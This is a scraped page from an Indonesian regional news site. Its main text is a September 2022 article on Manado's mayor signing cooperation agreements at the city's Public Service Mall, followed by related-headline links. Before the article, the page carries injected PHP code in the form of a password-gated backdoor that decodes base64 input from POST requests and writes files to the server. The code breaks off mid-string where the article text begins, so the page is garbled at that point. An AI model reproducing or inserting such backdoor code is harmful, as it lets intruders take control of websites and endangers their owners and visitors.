function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" Wali Kota Manado Tanda Tangani Kesepakatan dan Perjanjian Kerjasama di Mal Pelayanan Publik - IndoSulut

Menu

Mode Gelap
Rektor Sompie Lantik Enam Pejabat Baru Unsrat Walikota Manado Terima Kunjungan BPK RI Sulut Kementrian Lingkungan Hidup Gelar TOT Akademisi Tahap IV di UNSRAT Manado Walikota Manado Gelar Rapat Teknis Soal Relokasi Warga Korban Bencana Wali Kota dan Wakil Wali Kota Manado Hadiri Acara Penyerahan Sertifikat Tanah

Uncategorized · 15 Sep 2022 12:43 WIB ·

Wali Kota Manado Tanda Tangani Kesepakatan dan Perjanjian Kerjasama di Mal Pelayanan Publik


					Wali Kota Manado Tanda Tangani Kesepakatan dan Perjanjian Kerjasama di Mal Pelayanan Publik Perbesar

Wali Kota Manado Andrei Angouw saat menandatangani kesepakatan bersama di Mal Pelayanan Publik (MPP)

MANADO – Wali Kota Manado Andrei Angouw tandatangani kesepakatan bersama dan perjanjian kerjasama antara Pemerintah Kota dan organisasi penyelenggara pelayanan publik di Mal Pelayanan Publik (MPP) Kamis (15/9/2022).

“Saya memberikan apresiasi untuk semua yang sudah mengambil bagian dalam pelayanan di MPP ini. Dengan adanya MPP saya berharap pelayanan publik di Kota Manado semakin baik,” kata Wali Kota Manado saat menyampaikan sambutan.

Menurut Wali Kota, MPP juga sangat berguna untuk mempermudah masyarakat untuk mengurus berbagai berkas atau keperluan laiinya.

“Untuk saat ini ada tenant dari Garuda, Bank SulutGo, Discapil, Bapenda, dan Damkar yang sudah standby disini. Kedepannya saya berharap ada organisasi pelayanan publik lainnya yang boleh hadir disini untuk melengkapi pelayanan kepada masyarakat,” kata Wali Kota Manado.

Selesai menyampaikan sambutan, Wali Kota bersama Kepala Kejari Manado Esther Sibuea, Kapolres Manado Kombespol Julianto Sirait, Perwakilan BNN, Garuda, Dirut BSG, serta seluruh organisasi pelayanan publik lainnya.

Kedepannya Wali Kota berharap, seluruh pelayanan publik di MPP bisa memberikan pelayanan yang maksimal dan optimal.

“Demi memberikan pelayanan yang prima, kita bisa meningkatkan kepercayaan kepada masyarakat. Tidak perlu lagi pergi ke Pemkot untuk mengurus berkas-berkas dan lainnya karena disini bisa (MPP). Lokasinya juga strategis. Semoga kedepan masyarakat Manado bisa dilayani sebaik mungkin,” pungkas Wali Kota. (Auddy Manoppo)

Artikel ini telah dibaca 6 kali

badge-check

Penulis

Baca Lainnya

Safari Ramadhan Pemkot Manado di Kampung Jawa, Wali Kota: Kita Berikan Contoh Baik untuk Indonesia

26 Maret 2024 - 18:18 WIB

Inspektorat: Pemkot Manado Tidak Pernah Anggarkan Belanja Souvenir Seharga 3.8 Miliar

10 Maret 2024 - 10:58 WIB

Wali Kota Manado: Program Dana Duka diganti Bantuan Duka

27 Februari 2024 - 13:25 WIB

Capai 15 Ribu Suara Total, PDI Perjuangan Peluang 3 Kursi Dapil Tuminting – Bunaken

16 Februari 2024 - 21:31 WIB

Tertib saat Ikuti Kampanye, Richard Sualang Beri Apresiasi untuk Warga

1 Februari 2024 - 22:55 WIB

KPU Manado: Tidak Ada Potongan Apapun untuk Anggaran KPPS, Masyarakat Jangan Percaya Hoaks

30 Januari 2024 - 09:00 WIB

Trending di Uncategorized